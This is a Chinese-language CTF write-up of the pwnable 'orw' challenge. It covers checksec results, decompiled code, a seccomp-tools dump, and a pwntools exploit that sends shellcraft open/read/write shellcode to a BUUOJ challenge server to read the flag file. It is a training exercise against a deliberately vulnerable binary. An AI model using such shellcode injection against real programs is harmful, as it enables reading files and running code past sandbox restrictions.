HugeH4rD

pwnable_orw

Ubuntu 16 来源：https://github.com/bash-c/pwn_repo

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/pwnable_orw/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found				//canary保护
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments			//存在rwx段

IDA

main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

orw_seccomp()

unsigned int orw_seccomp()
{
  __int16 v1; // [esp+4h] [ebp-84h] BYREF
  char *v2; // [esp+8h] [ebp-80h]
  char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
  unsigned int v4; // [esp+6Ch] [ebp-1Ch]

  v4 = __readgsdword(0x14u);
  qmemcpy(v3, &unk_8048640, sizeof(v3));
  v1 = 12;
  v2 = v3;
  prctl(38, 1, 0, 0, 0);
  prctl(22, 2, &v1);
  return __readgsdword(0x14u) ^ v4;
}

0x02

---

思路 orw (系统调用被禁用)

seccomp 是 secure computing 的缩写，其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。在 Linux 系统里，大量的系统调用（system call）直接暴露给用户态程序。但是，并不是所有的系统调用都被需要，而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式，该模式下的进程只能调用4种系统调用（system call），即 read(), write(), exit() 和 sigreturn()，否则进程便会被终止。

seccomp-tools可以分析程序的seccomp状态，哪些被系统被禁用了安装
安装流程：
sudo apt install gcc ruby-dev
gem install seccomp-tools

└─$ seccomp-tools dump ./orw 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0x40000003  if (A != ARCH_I386) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x07 0x00 0x000000ad  if (A == rt_sigreturn) goto 0011
 0004: 0x15 0x06 0x00 0x00000077  if (A == sigreturn) goto 0011
 0005: 0x15 0x05 0x00 0x000000fc  if (A == exit_group) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == exit) goto 0011
 0007: 0x15 0x03 0x00 0x00000005  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == read) goto 0011
 0009: 0x15 0x01 0x00 0x00000004  if (A == write) goto 0011
 0010: 0x06 0x00 0x00 0x00050026  return ERRNO(38)
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW

shellcraft生成shellcode 完成相关调用

0x03

---

exp

from pwn import *

context(arch='i386', os='linux', log_level='debug')
path = './orw'
io = remote('node4.buuoj.cn', 29270)
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

shellcode = shellcraft.open('flag')
shellcode += shellcraft.read('eax', 'esp', 42)  # 3 eax
shellcode += shellcraft.write(1, 'esp', 42)
payload = asm(shellcode)
io.sendline(payload)
io.recv()
io.interactive()